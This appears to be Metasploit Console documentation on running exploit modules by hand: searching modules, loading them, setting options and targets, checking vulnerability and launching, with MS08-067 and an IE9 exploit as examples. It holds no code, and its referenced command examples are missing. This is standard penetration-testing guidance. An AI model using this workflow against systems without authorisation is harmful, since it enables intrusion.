Manual Exploitation
An exploit is a program that takes advantage of a specific vulnerability and provides an attacker with access to the target system. An exploit typically carries a payload and delivers it to the target system. The most common types of exploit modules are buffer overflow and SQL injection exploits.
To manually run an exploit, you must choose and configure an exploit module to run against a target. You choose the exploit module based on the information you have gathered about the host. For example, if you know that the target is missing the MS08-067 patch and has port 445/139 open, you can run the MS08-067 exploit to attempt exploitation.
Module Search
Before you can configure and run an exploit, you need to search for the module. The console includes the ability to search for modules using search operators.
You use search operators to create a query based on a specific module name, path, platform, author, CVE ID, BID, OSDVB ID, module type, or application. The search returns a list of results that match the query.
The following are search operators that are available:
- name
- path
- platform
- type
- app
- author
- cve
- bid
- osdvb
Search Syntax
To search for a module, use the following syntax:
Searching for a Module
Use the search command along with the search operator to search for a module
Showing All Exploit Modules
Use the show command to view a list of the exploits that are available.
This can take a few minutes. There are thousands of modules.
Loading a Module
Use the use command to load an exploit module. After you issue the use command, the Metasploit Console changes the command prompt to show the loaded module.
You can use the Tab key to complete the module path.
Resetting the Current Module Context
Use the back command to reset the prompt and to remove the module that is currently loaded.
Showing Options for a Module
Use the show command to view a list of options that are available for a particular module.
Show Required Options
After an exploit is loaded, you need to set all the required options. To find out what options are required, you can use the show missing command.
Showing Advanced Options for a Module
Use the show command to view a list of advanced options that are available for an exploit module.
Setting Options for a Module
Use the set command to configure options for a module. You need to specify the option name and the option value, as shown below:
Showing the Targets for a Module
Use the show targets command to view a list of potentially vulnerable targets. Most modules display a list of targets that may be vulnerable to the exploit. Each target has an ID and operating system.
If you know the victim machine’s operating system and version, you can specify the target for the exploit. Some modules provide an automatic targeting option. If you are unsure of the operating system or version, you can use the automatic targeting option if it is available, to automatically detect the victim machine’s OS and version.
Check to See if a Target is Vulnerable
Most exploits are version specific. For example, ms14_012_textrange is an exploit for Internet Explorer 9, but only works against versions of IE9 that were built between July 2013 to February 2014. To use this exploit, you would need to know the exact MSHTML build the target is using.
This is where the check command becomes very handy. You can use the check command to determine if a target is vulnerable to a particular exploit.
Not all modules support the check command.
Setting the Target for an Exploit
Use the set target command to specify a target for the exploit.
Running an Exploit Module
Use the exploit or run command to run an exploit module.
Resetting the Current Module Context
Use the back command to reset the command prompt and to remove the module that is currently loaded.
Reloading an Exploit
Use the reload command to refresh the metadata and methods for an exploit. This command is handy if you've edited the module while in the module context and need to update the module.